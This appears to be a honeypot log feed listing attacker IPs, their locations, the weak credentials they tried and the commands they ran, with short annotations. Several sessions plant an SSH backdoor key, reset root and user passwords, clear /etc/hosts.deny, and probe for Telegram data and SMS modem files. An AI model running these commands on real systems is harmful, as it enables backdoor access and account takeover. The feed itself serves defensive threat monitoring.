โ†ณ obfuscated system check
๐ŸŽญ rogue_bike_crypto (165.232.84.86) โ€” Amsterdam, The Netherlands ยท 1 session ยท 1 cmd
2026-06-26 01:41 EDT ยท as eth/eth
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m
โ†ณ obfuscated system check
๐ŸŽญ vapor_bibimbap_root (61.84.211.107) โ€” Anseong, South Korea ยท 1 session ยท 9 cmds
2026-06-26 00:29 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ stoic_dragon_root (120.48.124.81) โ€” Beijing, China ยท 1 session ยท 2 cmds
2026-06-25 22:58 EDT ยท as oracle/123.com
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ baroque_roo_sol (40.82.214.8) โ€” The Rocks, Australia ยท 1 session ยท 2 cmds
2026-06-25 22:53 EDT ยท as oracle/123.com
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ hollow_betel_root (211.75.252.252) โ€” Kaohsiung, Taiwan ยท 1 session ยท 17 cmds
2026-06-25 21:06 EDT ยท as oracle/Oracle@2025
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "Oracle@2025\nf3z0FCKoWVA9\nf3z0FCKoWVA9"|passwd|bash
$ Enter new UNIX password:
$ echo "Oracle@2025\nf3z0FCKoWVA9\nf3z0FCKoWVA9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ stoic_stroopwafel_root_6 (178.208.88.6) โ€” Amsterdam, The Netherlands ยท 32 sessions ยท 32 cmds
2026-06-25 17:10 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ silent_lantern_root (118.122.147.49) โ€” Chengdu, China ยท 1 session ยท 2 cmds
2026-06-25 16:58 EDT ยท as oracle/oracle2024
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ wired_mekong_root (45.117.177.47) โ€” Quแบญn Mฦฐแปi, Vietnam ยท 1 session ยท 2 cmds
2026-06-25 16:54 EDT ยท as oracle/oracle2024
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ baroque_dragon_root (58.222.244.226) โ€” Nanjing, China ยท 1 session ยท 2 cmds
2026-06-25 16:49 EDT ยท as oracle/oracle2024
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ hollow_dragon_root (111.26.6.111) โ€” Jilin, China ยท 4 sessions ยท 4 cmds
2026-05-09 04:13 EDT ยท as root/123456, root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m ร—4
๐ŸŽญ wired_kimchi_root (175.214.123.177) โ€” Seoul, South Korea ยท 1 session ยท 9 cmds
2026-06-25 13:36 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ murky_lantern_root (49.84.226.110) โ€” Nanjing, China ยท 1 session ยท 1 cmd
2026-06-25 12:31 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ grumpy_cactus_root (187.251.123.104) โ€” Valle de Chalco, Mexico ยท 1 session ยท 2 cmds
2026-06-25 11:41 EDT ยท as oracle/oracle01
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ stoic_strudel_root (51.75.64.35) โ€” Limburg an der Lahn, Germany ยท 1 session ยท 2 cmds
2026-06-25 11:13 EDT ยท as oracle/oracle01
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ drowsy_spice_root (92.4.76.12) โ€” Mumbai, India ยท 2 sessions ยท 18 cmds
2026-06-23 08:39 EDT ยท as root/root
/root/root login โ†’ /ip cloud print โ†’ ifconfig โ†’ uname -a โ†’ cat /proc/cpuinfo โ†’ ps | grep '[Mm]iner' โ†’ ps -ef | grep '[Mm]iner' โ†’ locate D877F783D5D3EF8Cs โ†’ ls -la ~/.local/share/TelegramDesktop/tdata โ†’ echo Hi | cat -n
$ /ip cloud print ร—2
$ ifconfig ร—2
โ†ณ network mapping
$ uname -a ร—2
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo ร—2
โ†ณ CPU profiling
$ ps | grep '[Mm]iner' ร—2
$ ps -ef | grep '[Mm]iner' ร—2
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ร—2
$ locate D877F783D5D3EF8Cs ร—2
$ echo Hi | cat -n ร—2
๐ŸŽญ glitchy_dutch_root (45.153.34.112) โ€” Eygelshoven, The Netherlands ยท 97 sessions ยท 97 cmds
2026-05-14 02:29 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 35x across 35 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—97
๐ŸŽญ cryptic_panda_root_60 (120.48.155.60) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-06-24 18:23 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ obsidian_bike_root (176.65.139.251) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-24 14:15 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ aloof_orchid_pi (43.160.249.143) โ€” Singapore, Singapore ยท 2 sessions ยท 2 cmds
2026-05-14 17:48 EDT ยท as pi/raspberry
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ weary_dragon_root (117.34.85.168) โ€” Liuxiang, China ยท 1 session ยท 2 cmds
2026-06-24 05:50 EDT ยท as oracle/oracle1234!
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ scrappy_bibimbap_root (218.145.181.48) โ€” Gangnam-gu, South Korea ยท 2 sessions ยท 18 cmds
2026-05-11 23:50 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print ร—2
$ ifconfig ร—2
โ†ณ network mapping
$ uname -a ร—2
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo ร—2
โ†ณ CPU profiling
$ ps | grep '[Mm]iner' ร—2
$ ps -ef | grep '[Mm]iner' ร—2
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ร—2
$ locate D877F783D5D3EF8Cs ร—2
$ echo Hi | cat -n ร—2
๐ŸŽญ ashen_bike_root (45.156.87.204) โ€” Eygelshoven, The Netherlands ยท 62 sessions ยท 62 cmds
2026-06-16 11:46 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 70x across 70 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—62
๐ŸŽญ glitchy_panda_root (14.103.83.66) โ€” Beijing, China ยท 1 session ยท 2 cmds
2026-06-24 01:04 EDT ยท as oracle/1111
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ cryptic_gaucho_root (157.92.145.135) โ€” Recoleta, Argentina ยท 103 sessions ยท 103 cmds
2026-05-15 01:54 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 68x across 68 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—103
๐ŸŽญ drowsy_specter_root_40 (5.187.97.40) โ€” Pointe-ร -Pitre, Guadeloupe ยท 1 session ยท 9 cmds
2026-06-23 21:45 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ zealous_dutch_root (45.153.34.186) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-23 17:41 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ listless_silk_root (114.55.14.48) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-06-23 17:33 EDT ยท as postgres/postgres
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ wily_dragon_root (27.0.135.6) โ€” Quzhou, China ยท 1 session ยท 1 cmd
2026-06-23 11:53 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ spectral_star_sol (92.118.39.62) โ€” Dallas, United States ยท 308 sessions ยท 308 cmds
2026-05-20 11:31 EDT ยท as sol/123, sol/123456, sol/sol
Ran uname 1727x across 1727 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—308
โ†ณ obfuscated system check
๐ŸŽญ silent_bosphorus_root (185.255.95.139) โ€” Bursa, Tรผrkiye ยท 1 session ยท 1 cmd
2026-06-23 08:59 EDT ยท as root/1234
echo
$ echo TEST
๐ŸŽญ weary_gouda_sol (2.57.122.177) โ€” Amsterdam, The Netherlands ยท 2415 sessions ยท 2415 cmds
2026-05-06 20:32 EDT ยท as firedancer/firedancer, raydium/raydium, sol/123
Ran uname 3954x across 3954 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—2415
โ†ณ obfuscated system check
๐ŸŽญ scrappy_blitz_root (178.104.222.175) โ€” Falkenstein, Germany ยท 1 session ยท 1 cmd
2026-06-23 05:24 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ crimson_void_root (91.92.40.7) โ€” Varna, Bulgaria ยท 43 sessions ยท 172 cmds
2026-06-14 13:34 EDT ยท as admin/123456, admin/admin, admin/admin123
export โ†’ uname โ†’ cat
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—43
$ uname -s -v -n -m 2 > /dev/null ร—43
$ uname -m 2 > /dev/null ร—43
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—43
๐ŸŽญ rogue_stroopwafel_sol (176.65.139.248) โ€” Eygelshoven, The Netherlands ยท 62 sessions ยท 62 cmds
2026-06-17 12:32 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—62
๐ŸŽญ hollow_gouda_sol (80.94.92.171) โ€” Amsterdam, The Netherlands ยท 64 sessions ยท 64 cmds
2026-05-08 07:36 EDT ยท as sol/123, sol/sol, ubuntu/ubuntu
Ran uname 176x across 176 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—64
โ†ณ obfuscated system check
๐ŸŽญ rusty_dragon_root (8.138.104.235) โ€” Guangzhou, China ยท 16 sessions ยท 16 cmds
2026-06-22 23:44 EDT ยท as admin/admin, deploy/deploy, deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—16
๐ŸŽญ feral_stein_root (77.110.107.31) โ€” Frankfurt am Main, Germany ยท 1 session ยท 19 cmds
2026-06-22 23:15 EDT ยท as root/pass123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:sRbhrPYMaP8s"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ jittery_k-pop_sol (211.228.218.47) โ€” Dong-gu, South Korea ยท 1 session ยท 20 cmds
2026-06-22 21:43 EDT ยท as sol/123456
chattr/lockr hardening โ†’ SSH key regeneration โ†’ passwd brute-force injection โ†’ CPU model enumeration via /proc/cpuinfo โ†’ memory audit via free โ†’ binary inspection of ls โ†’ crontab check โ†’ w user list โ†’ architecture detection via uname โ†’ final CPU count verification โ†’ top process monitoring
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "123456\nTf7tVWhXR0CK\nTf7tVWhXR0CK"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nTf7tVWhXR0CK\nTf7tVWhXR0CK\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ brisk_silk_root (210.16.168.11) โ€” Beijing, China ยท 1 session ยท 2 cmds
2026-06-22 21:32 EDT ยท as oracle/Admin123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
